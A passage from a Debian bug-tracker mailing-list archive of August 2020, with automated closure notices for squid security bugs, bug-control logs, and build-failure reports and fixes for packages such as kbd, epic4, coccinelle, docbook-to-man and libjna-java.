 - Fixes security issue SQUID-2020:10 (CVE-2020-15810) (Closes: #968934)
 .
   * debian/squid.rc: Fix several typos (Closes: #968101)
Checksums-Sha1:
 0733406e2637dc480a7dea9e787ade3b2353b3e9 2888 squid_4.13-1.dsc
 cac95c18789e9ecd6620c2f278fc3900498c065b 2452752 squid_4.13.orig.tar.xz
 261059cb4dbcc5e4dae7961c9bf334ba6c24cc4f 1194 squid_4.13.orig.tar.xz.asc
 f3c9c5f32231a326a38ea307fcabf21531097e69 40080 squid_4.13-1.debian.tar.xz
 bd78e2341136ec39cec4b1c72b9d1373e2d8a7da 8891 squid_4.13-1_amd64.buildinfo
Checksums-Sha256:
 b4172add09b63869397da29f499a0d0bb415eef16641536f99331503197b 2888 
squid_4.13-1.dsc
 6891a0f540e60779b4f24f1802a302f813c6f473ec7336a474ed68c3e2e53ee0 2452752 
squid_4.13.orig.tar.xz
 3e145c4af6322ff55bf299ff166c824c092ba2b62f822c8fdd7f885ec90c2ad2 1194 
squid_4.13.orig.tar.xz.asc
 af3b98049828c63bc2f791b24f0db71f09ed418b9b255cb6c581aa8566bc39e4 40080 
squid_4.13-1.debian.tar.xz
 378a262895db0a7c4139ad29c213442723d59740efa4a4076caebe4e7619ba98 8891 
squid_4.13-1_amd64.buildinfo
Files:
 6627effd8dc619b99008bd7fec8b1c0a 2888 web optional squid_4.13-1.dsc
 492e54afc15821141ff1d1d9903854d6 2452752 web optional squid_4.13.orig.tar.xz
 4be8191f3ce8e4891bc371cc1e72327d 1194 web optional squid_4.13.orig.tar.xz.asc
 f7634e5b5f28dc1a1bd4d73667e0f9d0 40080 web optional squid_4.13-1.debian.tar.xz
 eba3db2deafc987c6c406ad73becb14c 8891 web optional squid_4.13-1_amd64.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEjUhaNf8ebreQ5Q9tAoTyDCupfO0FAl9D3vEACgkQAoTyDCup
fO1spg//cmouO8WtaKyf6vpQ9FurVO/9eVGD3TN1HqqEjChfkboYzKkhZiUKl0OR
CmH1mVE2RoFA3pix2twfLJlxD+/K3EkcQojW7uTKaTMSNgUT7Uum9WUhk9eBWEvz
LFApn4otZJqqt6OnrU5WHYW4T04dv3hdpSkv+jCYeT8auvVoBnimxyK3lXcffwWc
PwhjIKc7JM/C6dSp9KUJKFtSOaxODfgKREwzVC1mHfHvwdAbClAETZuFvRItCuMj
syJwRhmmdNodDndZaD5bfqErlwU1MaBJ+5iOvRzCZPEI4d+0QnrJVcq7sX1T5RJp
pjQ7tozLErN71v3V5jbgApW471X8hPMr4Lt4gIHZm3Fu5kIEDCrSed8S/Be9qV/1
zwh60/ubA1zVecTvDVMgca5+EWtXcFquvRag1rSSWOLHD4lHwKLtQ2Zm2Ydx8pHF
sdVAJZelbgYk8RYJNnP5HaZult9yYvZkLMMwgxjDesfHAMKFaVm9dYmkMTeFuHYt

Bug#968932: marked as done (squid: CVE-2020-15811: SQUID-2020:8 HTTP(S) Request Splitting)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 15:49:31 +
with message-id 
and subject line Bug#968932: fixed in squid 4.13-1
has caused the Debian Bug report #968932,
regarding squid: CVE-2020-15811: SQUID-2020:8 HTTP(S) Request Splitting
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968932: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968932
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid.

CVE-2020-15811[0]:
| SQUID-2020:8 HTTP(S) Request Splitting

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2020-15811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15811
[1] https://github.com/squid-cache/squid/security/advisories/GHSA-c7p8-xqhm-49wv
[2] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_8.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: squid
Source-Version: 4.13-1
Done: Luigi Gangitano 

We believe that the bug you reported is fixed in the latest version of
squid, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luigi Gangitano  (supplier of updated squid package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 24 Aug 2020 17:27:54 +0200
Source: squid
Architecture: source
Version: 4.13-1
Distribution: unstable
Urgency: high
Maintainer: Luigi Gangitano 
Changed-By: Luigi Gangitano 
Closes: 968101 968932 968933 968934
Changes:
 squid (4.13-1) unstable; urgency=high
 .
   [ Amos Jeffries  ]
   * New Upstream Release
 - Fixes security issue SQUID-2020:8 (CVE-2020-15811) (Closes: #968932)
 - Fixes security issue SQUID-2020:9 (Closes: #968933)
 - Fixes security issue SQUID-2020:10 (CVE-2020-15810) (Closes: #968934)
 .
   * debian/squid.rc: Fix several typos (Closes: #968101)
Checksums-Sha1:
 0733406e2637dc480a7dea9e787ade3b2353b3e9 2888 squid_4.13-1.dsc
 cac95c18789e9ecd6620c2f278fc3900498c065b 2452752 squid_4.13.orig.tar.xz
 261059cb4dbcc5e4dae7961c9bf334ba6c24cc4f 1194 squid_4.13.orig.tar.xz.asc
 f3c9c5f32231a326a38ea307fcabf21531097e69 40080 squid_4.13-1.debian.tar.xz
 bd78e2341136ec39cec4b1c72b9d1373e2d8a7da 8891 squid_4.13-1_amd64.buildinfo
Checksums-Sha256:
 b4172add09b63869397da29f499a0d0bb415eef16641536f99331503197b 2888 
squid_4.13-1.dsc
 6891a0f540e60779b4f24f1802a302f813c6f473ec7336a474ed68c3e2e53ee0 2452752 
squid_4.13.orig.tar.xz
 3e145c4af6322ff55bf299ff166c824c092ba2b62f822c8fdd7f885ec90c2ad2 1194 
squid_4.13.orig.tar.xz.asc
 af3b98049828c63bc2f791b24f0db71f09ed418b9b255cb6c581aa8566bc39e4 40080 
squid_4.13-1.debian.tar.xz
 378a262895db0a7c4139ad29c213442723d59740efa4a4076caebe4e7619ba98 8891 
squid_4.13-1_amd64.buildinfo
Files:
 6627effd8dc619b99008bd7fec8b1c0a 2888 web optional squid_4.13-1.dsc
 492e54afc15821141ff1d1d9903854d6 2452752 web optional squid_4.13.orig.tar.xz
 4be8191f3ce8e4891bc371cc1e72327d 1194 web optional squid_4.13.orig.tar.xz.asc
 f7634e5b5f28dc1a1bd4d73667e0f9d0 40080 web optional squid_4.13-1.debian.tar.xz
 eba3db2deafc987c6c406ad73becb14c 8891 web optional squid_4.13-1_amd64.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEjUhaNf8ebreQ5Q9tAoTyDCupfO0FAl9D3vEACgkQAoTyDCup
fO1spg//cmouO8WtaKyf6vpQ9FurVO/9eVGD3TN1HqqEjChfkboYzKkhZiUKl0OR
CmH1mVE2RoFA3pix2twfLJlxD+/K3EkcQojW7uTKaTMSNgUT7Uum9WUhk9eBWEvz
LFApn4otZJqqt6OnrU5WHYW4T04dv3hdpSkv+jCYeT8auvVoBnimxyK3lXcffwWc
PwhjIKc7JM/C6dSp9KUJKFtSOaxODfgKREwzVC1mHfHvwdAbClAETZuFvRItCuMj
syJwRhmmdNodDndZaD5bfqErlwU1MaBJ+5iOvRzCZPEI4d+0QnrJVcq7sX1T5RJp
pjQ7tozLErN71v3V5jbgApW471X8hPMr4Lt4gIHZm3Fu5kIEDCrSed8S/Be9qV/1
zwh60/ubA1zVecTvDVMgca5+EWtXcFquvRag1rSSWOLHD4lHwKLtQ2Zm2Ydx8pHF
sdVAJZelbgYk8RYJNnP5HaZult9yYvZkLMMwgxjDesfHAMKFaVm9dYmkMTeFuHYt

Processed: tagging 966768, affects 965007

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> tags 966768 + experimental
Bug #966768 [src:openturns] openturns: Unversioned Python removal in 
sid/bullseye
Bug #937214 [src:openturns] openturns: Python2 removal in sid/bullseye
Added tag(s) experimental.
Added tag(s) experimental.
> affects 965007 + src:gst-plugins-bad1.0
Bug #965007 [pitivi] pitivi: ships a copy of gstreamer libraries
Added indication that 965007 affects src:gst-plugins-bad1.0
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
937214: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=937214
965007: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965007
966768: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966768
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968933: marked as done (squid: SQUID-2020:9 Denial of Service processing Cache Digest Response)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 15:49:31 +
with message-id 
and subject line Bug#968933: fixed in squid 4.13-1
has caused the Debian Bug report #968933,
regarding squid: SQUID-2020:9 Denial of Service processing Cache Digest Response
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968933: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968933
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: squid
Version: 4.12-1
Severity: grave
Tags: security upstream
Justification: user security hole
X-Debbugs-Cc: car...@debian.org, Debian Security Team 

Hi,

The following vulnerability was published for squid, but there is no
CVE assigned yet:

| SQUID-2020:9 Denial of Service processing Cache Digest Response 

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
(once it is assigned if that happends before the upload).

For further information see:

[0] https://github.com/squid-cache/squid/security/advisories/GHSA-vvj7-xjgq-g2jg
[1] http://www.squid-cache.org/Versions/v4/changesets/SQUID-2020_9.patch

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
--- End Message ---
--- Begin Message ---
Source: squid
Source-Version: 4.13-1
Done: Luigi Gangitano 

We believe that the bug you reported is fixed in the latest version of
squid, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Luigi Gangitano  (supplier of updated squid package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 24 Aug 2020 17:27:54 +0200
Source: squid
Architecture: source
Version: 4.13-1
Distribution: unstable
Urgency: high
Maintainer: Luigi Gangitano 
Changed-By: Luigi Gangitano 
Closes: 968101 968932 968933 968934
Changes:
 squid (4.13-1) unstable; urgency=high
 .
   [ Amos Jeffries  ]
   * New Upstream Release
 - Fixes security issue SQUID-2020:8 (CVE-2020-15811) (Closes: #968932)
 - Fixes security issue SQUID-2020:9 (Closes: #968933)
 - Fixes security issue SQUID-2020:10 (CVE-2020-15810) (Closes: #968934)
 .
   * debian/squid.rc: Fix several typos (Closes: #968101)
Checksums-Sha1:
 0733406e2637dc480a7dea9e787ade3b2353b3e9 2888 squid_4.13-1.dsc
 cac95c18789e9ecd6620c2f278fc3900498c065b 2452752 squid_4.13.orig.tar.xz
 261059cb4dbcc5e4dae7961c9bf334ba6c24cc4f 1194 squid_4.13.orig.tar.xz.asc
 f3c9c5f32231a326a38ea307fcabf21531097e69 40080 squid_4.13-1.debian.tar.xz
 bd78e2341136ec39cec4b1c72b9d1373e2d8a7da 8891 squid_4.13-1_amd64.buildinfo
Checksums-Sha256:
 b4172add09b63869397da29f499a0d0bb415eef16641536f99331503197b 2888 
squid_4.13-1.dsc
 6891a0f540e60779b4f24f1802a302f813c6f473ec7336a474ed68c3e2e53ee0 2452752 
squid_4.13.orig.tar.xz
 3e145c4af6322ff55bf299ff166c824c092ba2b62f822c8fdd7f885ec90c2ad2 1194 
squid_4.13.orig.tar.xz.asc
 af3b98049828c63bc2f791b24f0db71f09ed418b9b255cb6c581aa8566bc39e4 40080 
squid_4.13-1.debian.tar.xz
 378a262895db0a7c4139ad29c213442723d59740efa4a4076caebe4e7619ba98 8891 
squid_4.13-1_amd64.buildinfo
Files:
 6627effd8dc619b99008bd7fec8b1c0a 2888 web optional squid_4.13-1.dsc
 492e54afc15821141ff1d1d9903854d6 2452752 web optional squid_4.13.orig.tar.xz
 4be8191f3ce8e4891bc371cc1e72327d 1194 web optional squid_4.13.orig.tar.xz.asc
 f7634e5b5f28dc1a1bd4d73667e0f9d0 40080 web optional squid_4.13-1.debian.tar.xz
 eba3db2deafc987c6c406ad73becb14c 8891 web optional squid_4.13-1_amd64.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCgAdFiEEjUhaNf8ebreQ5Q9tAoTyDCupfO0FAl9D3vEACgkQAoTyDCup
fO1spg//cmouO8WtaKyf6vpQ9FurVO/9eVGD3TN1HqqEjChfkboYzKkhZiUKl0OR
CmH1mVE2RoFA3pix2twfLJlxD+/K3EkcQojW7uTKaTMSNgUT7Uum9WUhk9eBWEvz
LFApn4otZJqqt6OnrU5WHYW4T04dv3hdpSkv+jCYeT8auvVoBnimxyK3lXcffwWc
PwhjIKc7JM/C6dSp9KUJKFtSOaxODfgKREwzVC1mHfHvwdAbClAETZuFvRItCuMj
syJwRhmmdNodDndZaD5bfqErlwU1MaBJ+5iOvRzCZPEI4d+0QnrJVcq7sX1T5RJp
pjQ7tozLErN71v3V5jbgApW471X8hPMr4Lt4gIHZm3Fu5kIEDCrSed8S/Be9qV/1
zwh60/ubA1zVecTvDVMgca5+EWtXcFquvRag1rSSWOLHD4lHwKLtQ2Zm2Ydx8pHF
sdVAJZelbgYk8RYJNnP5HaZult9yYvZkLMMwgxjDesfHAMKFaVm9dYmkMTeFuHYt

Processed: Re: Bug#965985: CVE-2020-4042 / CVE-2020-11061

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> clone 965985 -1
Bug #965985 [src:bareos] CVE-2020-4042 / CVE-2020-11061
Bug 965985 cloned as bug 968957
> retitle 965985 bareos: CVE-2020-4042
Bug #965985 [src:bareos] CVE-2020-4042 / CVE-2020-11061
Changed Bug title to 'bareos: CVE-2020-4042' from 'CVE-2020-4042 / 
CVE-2020-11061'.
> retitle -1 bareos: CVE-2020-11061
Bug #968957 [src:bareos] CVE-2020-4042 / CVE-2020-11061
Changed Bug title to 'bareos: CVE-2020-11061' from 'CVE-2020-4042 / 
CVE-2020-11061'.
> forwarded 965985 https://bugs.bareos.org/view.php?id=1250
Bug #965985 [src:bareos] bareos: CVE-2020-4042
Set Bug forwarded-to-address to 'https://bugs.bareos.org/view.php?id=1250'.
> forwarded -1 https://bugs.bareos.org/view.php?id=1210
Bug #968957 [src:bareos] bareos: CVE-2020-11061
Set Bug forwarded-to-address to 'https://bugs.bareos.org/view.php?id=1210'.

-- 
965985: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965985
968957: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968957
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#965985: CVE-2020-4042 / CVE-2020-11061

2020-08-24 Thread Salvatore Bonaccorso
Control: clone 965985 -1
Control: retitle 965985 bareos: CVE-2020-4042
Control: retitle -1 bareos: CVE-2020-11061
Control: forwarded 965985 https://bugs.bareos.org/view.php?id=1250
Control: forwarded -1 https://bugs.bareos.org/view.php?id=1210

Hi Moritz,

On Tue, Jul 21, 2020 at 09:32:16PM +0200, Moritz Muehlenhoff wrote:
> Source: bareos
> Severity: grave
> Tags: security
> 
> CVE-2020-11061:
> https://github.com/bareos/bareos/security/advisories/GHSA-mm45-cg35-54j4
> 
> CVE-2020-4042
> https://github.com/bareos/bareos/security/advisories/GHSA-vqpj-2vhj-h752

Going to clone/split this bug into two separately, with the following
reason. While both are covered in the supported Debian releases
samewise from the affected versions, CVE-2020-4042 is harder to handle
in the affected versions. Splitting the bug makes it easier to handle
the issues sepaately and e.g. fixing CVE-2020-11061 first with an
isolated fix.

Hope you are fine with that move, will update the security-tracker
then accordingly.

Regards,
Salvatore



Bug#968956: kbd: fails to build on big endian (s390x)

2020-08-24 Thread Andreas Henriksson
Package: kbd
Version: 2.2.0-1
Severity: serious
Tags: upstream
Justification: FTBFS on release arch
Forwarded: https://github.com/legionus/kbd/issues/40


Hello,

The new kbd release recently uploaded to unstable (2.2.0)
which includes fixes to build with gcc-10 has a regression
on big-endian architectures successfully caught by the
test-suite.

More information is already available in the upstream
issue tracker where someone has done the initial investigations.
(See forwarded url above.)

Would be great if someone from the debian s390 porters team
would follow up with which path to go down and propose
a patch that implements the solution. Alternatively we
could disable the test-suite on s390 in debian if you
think this issue is not important enough to hold up the
other fixes from entering testing/bullseye.

Regards,
Andreas Henriksson



Bug#957176: epic4: diff for NMU version 1:2.10.6-1.1

2020-08-24 Thread Sudip Mukherjee
Control: tags 957176 + patch
Control: tags 957176 + pending

Dear maintainer,

I've prepared an NMU for epic4 (versioned as 1:2.10.6-1.1) and
uploaded it to DELAYED/2. Please feel free to tell me if I
should cancel it.

--
Regards
Sudip

diff -Nru epic4-2.10.6/debian/changelog epic4-2.10.6/debian/changelog
--- epic4-2.10.6/debian/changelog   2016-07-24 15:06:23.0 +0100
+++ epic4-2.10.6/debian/changelog   2020-08-24 15:48:18.0 +0100
@@ -1,3 +1,10 @@
+epic4 (1:2.10.6-1.1) unstable; urgency=medium
+
+  * Non-maintainer upload.
+  * Fix ftbfs with GCC-10. (Closes: #957176)
+
+ -- Sudip Mukherjee   Mon, 24 Aug 2020 15:48:18 
+0100
+
 epic4 (1:2.10.6-1) unstable; urgency=medium
 
   * New upstream release
diff -Nru epic4-2.10.6/debian/patches/gcc-10.patch 
epic4-2.10.6/debian/patches/gcc-10.patch
--- epic4-2.10.6/debian/patches/gcc-10.patch1970-01-01 01:00:00.0 
+0100
+++ epic4-2.10.6/debian/patches/gcc-10.patch2020-08-24 15:46:45.0 
+0100
@@ -0,0 +1,18 @@
+Description: Fix ftbfs with GCC-10
+
+Author: Sudip Mukherjee 
+Bug-Debian: https://bugs.debian.org/957176
+Forwarded: no
+
+---
+
+--- epic4-2.10.6.orig/include/irc.h
 epic4-2.10.6/include/irc.h
+@@ -166,6 +166,6 @@ const  char *  current_loader  (void);  /*
+   char *  current_package (void);  /* XXX command.c */
+ 
+ /* keep track of signals for scripted events */
+-volatile int signals_caught[NSIG];
++extern volatile int signals_caught[NSIG];
+ 
+ #endif /* __irc_h */
diff -Nru epic4-2.10.6/debian/patches/series epic4-2.10.6/debian/patches/series
--- epic4-2.10.6/debian/patches/series  2016-07-24 15:18:53.0 +0100
+++ epic4-2.10.6/debian/patches/series  2020-08-24 14:25:09.0 +0100
@@ -4,3 +4,4 @@
 install_dir.patch
 man.patch
 reproducible_build.patch
+gcc-10.patch



Processed: epic4: diff for NMU version 1:2.10.6-1.1

2020-08-24 Thread Debian Bug Tracking System
Processing control commands:

> tags 957176 + patch
Bug #957176 [src:epic4] epic4: ftbfs with GCC-10
Added tag(s) patch.
> tags 957176 + pending
Bug #957176 [src:epic4] epic4: ftbfs with GCC-10
Added tag(s) pending.

-- 
957176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957176
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Processed: tagging 957151

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> tags 957151 + pending upstream fixed-upstream
Bug #957151 [src:drbd-utils] drbd-utils: ftbfs with GCC-10
Added tag(s) upstream, pending, and fixed-upstream.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
957151: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=957151
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968946: coccinelle: FTBFS in sid

2020-08-24 Thread Gianfranco Costamagna
Source: coccinelle
Version: 1.0.8.deb-3
Severity: serious

Hello, some ocaml changes broke the build of coccinelle

http://debomatic-amd64.debian.net/distribution#unstable/coccinelle/1.0.8.deb-3/buildlog

snip of the failure:
OCAMLCparsing_cocci/command_line.mli
File "parsing_cocci/parser_cocci_menhir.mli", line 234, characters 25-36:
234 |   (Ast_cocci.meta_name * Ast.metavar) option * Ast.mvinit)
   ^^^
Error: Unbound module AstOCAMLCparsing_c/token_annot.mli

OCAMLCparsing_c/flag_parsing_c.mli
make[1]: *** [Makefile:421: parsing_cocci/parser_cocci_menhir.cmi] Error 2

thanks for having a look

Gianfranco



Bug#968900: marked as done (docbook-to-man: /usr/bin/instant is no longer installed)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 12:18:54 +
with message-id 
and subject line Bug#968900: fixed in docbook-to-man 1:2.0.0-44
has caused the Debian Bug report #968900,
regarding docbook-to-man: /usr/bin/instant is no longer installed
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968900: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968900
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: docbook-to-man
Version: 1:2.0.0-43
Severity: grave
X-Debbugs-Cc: none, Hilko Bengen 

Dear Maintainer,

while trying to fix an FTBFS introduced with the upgrade to GCC 10 in
hfsplus, I have stumbled across a docbook-to-man failure because
/usr/bin/instant is no longer installed.

Looking at the build package's build log, this also looks like a
GCC-10-related error:

,
| /usr/bin/ld: translate.o:./Instant/translate.h:131: multiple definition of 
`TrSpecs'; main.o:./Instant/translate.h:131: first defined here
| /usr/bin/ld: translate.o:./Instant/translate.h:133: multiple definition of 
`nCharMap'; main.o:./Instant/translate.h:133: first defined here
| /usr/bin/ld: translate.o:./Instant/translate.h:132: multiple definition of 
`CharMap'; main.o:./Instant/translate.h:132: first defined here
`

This is then ignored by the main Makefile which leads to the missing
/usr/bin/instant.

Cheers,
-Hilko
--- End Message ---
--- Begin Message ---
Source: docbook-to-man
Source-Version: 1:2.0.0-44
Done: Chris Lamb 

We believe that the bug you reported is fixed in the latest version of
docbook-to-man, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Chris Lamb  (supplier of updated docbook-to-man package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

Format: 1.8
Date: Mon, 24 Aug 2020 12:59:14 +0100
Source: docbook-to-man
Architecture: source
Version: 1:2.0.0-44
Distribution: unstable
Urgency: medium
Maintainer: Chris Lamb 
Changed-By: Chris Lamb 
Closes: 968900
Changes:
 docbook-to-man (1:2.0.0-44) unstable; urgency=medium
 .
   * Fix compatibility with GCC-10, restoring /usr/bin/instant.
 (Closes: #968900)
   * Ensure build failures in subdirectories cause build failure of the whole
 package.
   * Refresh all patches.
   * Drop references to .travis.yml.
Checksums-Sha1:
 f8a9d99be417273869a7b48f578137a9911cccd7 1960 docbook-to-man_2.0.0-44.dsc
 ba0f3f98bf9747fc571accf5202c590c0355af7a 26620 
docbook-to-man_2.0.0-44.debian.tar.xz
 d3ea402c01b75452ddbaedb58cfe14898c83aab5 5596 
docbook-to-man_2.0.0-44_amd64.buildinfo
Checksums-Sha256:
 17a70065cc84be4dd327498e62a0fb2ef4746471278018c19fadda1f2348f070 1960 
docbook-to-man_2.0.0-44.dsc
 ec884e5daa3b2aec21f7a8981ad0ed840174bb7d53c67c98f87f8a83b5145d07 26620 
docbook-to-man_2.0.0-44.debian.tar.xz
 9f5f79d5f8ed18d7d95c8d0f4f3a3a70d0dc3c2886e90a53f05f024bb02ff83f 5596 
docbook-to-man_2.0.0-44_amd64.buildinfo
Files:
 47c5f2829a6aa5e6c384797fd6a5de8e 1960 text optional docbook-to-man_2.0.0-44.dsc
 0998136f283be2427726823f77310cc3 26620 text optional 
docbook-to-man_2.0.0-44.debian.tar.xz
 85717e2b61e8f1eabd9692026cab227c 5596 text optional 
docbook-to-man_2.0.0-44_amd64.buildinfo

-BEGIN PGP SIGNATURE-

iQIzBAEBCAAdFiEEwv5L0nHBObhsUz5GHpU+J9QxHlgFAl9DrFMACgkQHpU+J9Qx
HliMmQ//coyqlBbLZtolwCA5h6jBITJato2ZM7njNzJhvOFrRxZtv4v531932y8o
Q+IfyeyrVUabgeeZVZIzKo2YlkzdZG3N+5QGpe8SoqTXUtUb52A72A+RODAaLFAn
W+MF2JId/+l50jn1YpXeWu+9MDeuc3LOk5+6FbW/e6a24GGQ+RnLmOO4ARRTdZGe
60F7A4ghzpxDPPCMwzLxKjLlyC3azPfq0PH2RNwMdRdVk6raHMnn5zvmxT4VbM5n
4QC+1nAY+lTUE59f6KagWMaVpK/2prqZSpuy3imQChUozfc50RWk6Mxp19pJhSX+
uQkjo248IA8wWfctTqCuEdAYEQOnS02/ThMR3GBpwPS19gPqOK6VCGpEpyLtvZbR
OcAQKvlkLR0GyvMltv4DGKghxQvL+3hQedUFt8aqRKak9PtPtEGMlt2Vh9xoPZ6B
bZwGBed2EVwU+rhHCXefmckkiuZYnoA3SNjSY7oGh2orryRiZEyvB5IAKAFW9La0
e0J6HIBkTGPYbIy4Uadlxa/MaQCMM6ND921Eds944czS2LZgT5Gt+yX3yW/FBKLK
+nHV5FjFucBeL5E3lKuW02W+2BySJj0QgTy7VfeFMq8dqmeTVBVS0Sk2QsEms30E
du3fOKzHen3zrO3OsG6Cbz2i+GI7/UknRyvgEbD0fEyNYd1+8js=
=gIM3
-END PGP SIGNATURE End Message ---


Bug#966889: marked as done (libjna-java: FTBFS: [exec] dispatch.c:1770:23: error: ‘alloca’ bound is unknown [-Werror=alloca-larger-than=])

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 11:19:59 +
with message-id 
and subject line Bug#966889: fixed in libjna-java 5.5.0-1.1
has caused the Debian Bug report #966889,
regarding libjna-java: FTBFS:  [exec] dispatch.c:1770:23: error: ‘alloca’ 
bound is unknown [-Werror=alloca-larger-than=]
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
966889: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966889
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: libjna-java
Version: 5.5.0-1
Severity: serious
Justification: FTBFS on amd64
Tags: bullseye sid ftbfs
Usertags: ftbfs-20200802 ftbfs-bullseye

Hi,

During a rebuild of all packages in sid, your package failed to build
on amd64.

Relevant part (hopefully):
> make[1]: Entering directory '/<>'
> ln -s /usr/share/java/ant.jar lib/ant.jar
> ant -f build.xml \
> -Dcompatibility=8 \
> -Dcflags_extra.native="" \
> -Ddynlink.native=true \
> -Dnomixedjar.native=true \
> -Djni.md5="" \
> -Djar.compress=true \
> -Dmaven-release=true \
> -Dbuild-native=true \
> -Dyear=2020 \
> jar javadoc contrib-jars native
> Buildfile: /<>/build.xml
>   [typedef] Could not load definitions from resource 
> org/apache/maven/artifact/ant/antlib.xml. It could not be found.
>   [typedef] Could not load definitions from resource 
> org/codehaus/mojo/animal_sniffer/antlib.xml. It could not be found.
> 
> -prepare-anttools:
> [mkdir] Created dir: /<>/build/ant-tools
> [javac] Compiling 3 source files to /<>/build/ant-tools
> [javac] Note: /<>/src/com/sun/jna/ELFAnalyser.java uses 
> unchecked or unsafe operations.
> [javac] Note: Recompile with -Xlint:unchecked for details.
> 
> -dynamic-properties:
> [mkdir] Created dir: /<>/build/native-linux-x86-64
> [mkdir] Created dir: /<>/build/headers
> [mkdir] Created dir: /<>/build/classes
> [mkdir] Created dir: /<>/build/test-classes
> [mkdir] Created dir: /<>/build/reports
> [mkdir] Created dir: /<>/doc
> [mkdir] Created dir: /<>/build/aar
>  [echo] Java version 11.0.8, compatibility: 8, ant: 11
>  [echo] JNA version 5.5.0, native 6.1.0, android 505
>  [echo] OpenJDK 64-Bit Server VM (Debian, 11.0.8+10-post-Debian-1)
>  [echo] java.home=/usr/lib/jvm/java-11-openjdk-amd64
>  [echo] 
> java.library.path=/usr/java/packages/lib:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
>  [echo] os.prefix=linux-x86-64
>  [echo] os.name=Linux
>  [echo] os.arch=amd64 (little)
>  [echo] build=build
